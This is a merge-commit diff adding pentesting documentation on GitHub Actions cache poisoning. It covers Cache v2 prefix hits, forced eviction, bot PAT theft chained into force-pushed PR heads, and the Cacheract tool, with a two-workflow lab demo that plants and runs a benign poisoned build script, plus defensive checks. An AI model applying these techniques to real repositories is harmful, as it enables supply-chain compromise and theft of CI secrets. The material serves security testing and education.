Merge pull request #276 from HackTricks-wiki/pr-271

Expand GitHub Actions cache poisoning docs with Angular 2026 + Cacheract demo

Author: carlospolop

src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

@@ -498,6 +498,14 @@ GitHub exposes a cross-workflow cache that is keyed only by the string you suppl
 - Official actions (`setup-node`, `setup-python`, dependency caches, etc.) frequently reuse deterministic keys, so identifying the correct key is trivial once the workflow file is public.
 - Restores are just zstd tarball extractions with no integrity checks, so poisoned caches can overwrite scripts, `package.json`, or other files under the restore path.
 
+**Advanced techniques (Angular 2026 case study)**
+
+- Cache v2 behaves as if all keys are restore keys: an exact miss can still restore a different entry that shares the same prefix, which enables near-collision pre-seeding attacks.
+- Since **November 20, 2025**, GitHub evicts cache entries immediately once repository cache size exceeds the quota (10 GB by default). Attackers can bloat cache usage with junk, force eviction, and write poisoned entries in the same workflow run.
+- Reusable actions wrapping `actions/setup-node` with `cache-dependency-path` can create hidden trust-boundary overlap, letting an untrusted workflow poison caches later consumed by secret-bearing bot/release workflows.
+- A realistic post-poisoning pivot is stealing a bot PAT and force-pushing approved bot PR heads (if approval-reset rules exempt bot actors), then swapping action SHAs to imposter commits before maintainers merge.
+- Tooling like `Cacheract` automates cache runtime token handling, cache eviction pressure, and poisoned entry replacement, which reduces operational complexity during authorized red-team simulation.
+
 **Mitigations**
 
 - Use distinct cache key prefixes per trust boundary (e.g., `untrusted-` vs `release-`) and avoid falling back to broad `restore-keys` that allow cross-pollination.

src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md

@@ -60,10 +60,114 @@ On a cache hit, the restore action will extract the archive as-is. If the cache
 - Look for deterministic cache keys reused across trust boundaries (for example, `pip-${{ hashFiles('poetry.lock') }}`) or permissive `restore-keys`, then save your malicious tarball before the privileged workflow runs.
 - Monitor logs for `Cache saved` entries or add your own cache-save step so the next release job restores the payload and executes the trojanized scripts or binaries.
 
+## Newer techniques seen in the Angular (2026) chain
+
+- **Cache v2 "prefix hit" behavior:** In Cache v2, exact misses can still restore another entry sharing the same key prefix (effectively "all keys are restore keys"). Attackers can pre-seed near-collision keys so a future miss falls back to the poisoned object.
+- **Forced eviction in one run:** Since **November 20, 2025**, GitHub evicts entries immediately when repository cache usage exceeds the limit (10 GB by default). An attacker can upload junk cache data first, evict legitimate entries during the same job, and then write the malicious cache key without waiting for a daily cleanup cycle.
+- **`setup-node` cache pivots via reusable actions:** Reusable/internal actions that wrap `actions/setup-node` with `cache-dependency-path` can silently bridge low-trust and high-trust workflows. If both paths hash to shared keys, poisoning the dependency cache can execute in privileged automation (for example Renovate/bot jobs).
+- **Chaining cache poisoning into bot-driven supply chain abuse:** In the Angular case, cache poisoning exposed a bot PAT, which was then usable to force-push bot-owned PR heads after approval. If approval-reset rules exempt bot actors, this enables swapping reviewed commits for malicious ones (for example imposter action SHAs) before merge.
+
+##å Cacheract
+
+[`Cacheract`](https://github.com/adnanekhan/cacheract) is a PoC-focused toolkit for GitHub Actions cache poisoning in authorized testing. The practical value is that it automates the fragile parts that are easy to get wrong manually:
+
+- Detect and use runtime cache context from the runner (`ACTIONS_RUNTIME_TOKEN` and cache service URL).
+- Enumerate and target candidate cache keys/versions used by downstream workflows.
+- Force eviction by overfilling cache quota (when applicable) and then writing attacker-controlled entries in the same run.
+- Seed poisoned cache content so later workflows restore and execute modified tooling.
+
+This is especially useful in Cache v2 environments where timing and key/version behavior matter more than in early cache implementations.
+
+## Demo
+
+Use this only in repositories you own or are explicitly allowed to test.
+
+### 1. Vulnerable workflow (untrusted trigger can save cache)
+
+This workflow simulates a `pull_request_target` anti-pattern: it writes cache content from attacker-controlled context and saves it under a deterministic key.
+
+```yaml
+name: untrusted-cache-writer
+on:
+  pull_request_target:
+    types: [opened, synchronize, reopened]
+
+permissions:
+  contents: read
+
+jobs:
+  poison:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Build "toolchain" from untrusted context (demo)
+        run: |
+          mkdir -p toolchain/bin
+          cat > toolchain/bin/build << 'EOF'
+          #!/usr/bin/env bash
+          echo "POISONED_BUILD_PATH"
+          echo "workflow=${GITHUB_WORKFLOW}" > /tmp/cache-poisoning-demo.txt
+          EOF
+          chmod +x toolchain/bin/build
+      - uses: actions/cache/save@v4
+        with:
+          path: toolchain
+          key: linux-build-${{ hashFiles('toolchain.lock') }}
+```
+
+### 2. Privileged workflow (restores and executes cached binary/script)
+
+This workflow restores the same key and executes `toolchain/bin/build` while holding a dummy secret. If poisoned, execution path is attacker-controlled.
+
+```yaml
+name: privileged-consumer
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  release_like_job:
+    runs-on: ubuntu-latest
+    env:
+      DEMO_SECRET: ${{ secrets.DEMO_SECRET }}
+    steps:
+      - uses: actions/cache/restore@v4
+        with:
+          path: toolchain
+          key: linux-build-${{ hashFiles('toolchain.lock') }}
+      - name: Execute cached build tool
+        run: |
+          ./toolchain/bin/build
+          test -f /tmp/cache-poisoning-demo.txt && echo "Poisoning confirmed"
+```
+
+### 3. Run the lab
+
+- Add a stable `toolchain.lock` file so both workflows resolve the same cache key.
+- Trigger `untrusted-cache-writer` from a test PR.
+- Trigger `privileged-consumer` via `workflow_dispatch`.
+- Confirm `POISONED_BUILD_PATH` appears in logs and `/tmp/cache-poisoning-demo.txt` is created.
+
+### 4. What this demonstrates technically
+
+- **Cross-workflow cache trust break:** The writer and consumer workflows do not share trust level, but they share cache namespace.
+- **Execution-on-restore risk:** No integrity validation is performed before executing a restored script/binary.
+- **Deterministic key abuse:** If a high-trust job uses predictable keys, a low-trust job can preposition malicious content.
+
+### 5. Defensive verification checklist
+
+- Split keys by trust boundary (`pr-`, `ci-`, `release-`) and avoid shared prefixes.
+- Disable cache writes in untrusted workflows.
+- Hash/verify restored executable content before running it.
+- Avoid executing tools directly from cache paths.
+
 ## References
 
 - [A Survey of 2024–2025 Open-Source Supply-Chain Compromises and Their Root Causes](https://words.filippo.io/compromise-survey/)
 - [The Monsters in Your Build Cache: GitHub Actions Cache Poisoning](http://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [Turning Almost Nothing into a Supply Chain Compromise of Angular with GitHub Actions Cache Poisoning](https://adnanthekhan.com/posts/angular-compromise-through-dev-infra/)
 - [ActionsCacheBlasting (deprecated, Cache V2) / Cacheract](https://github.com/AdnaneKhan/ActionsCacheBlasting)
 
 {{#include ../../../banners/hacktricks-training.md}}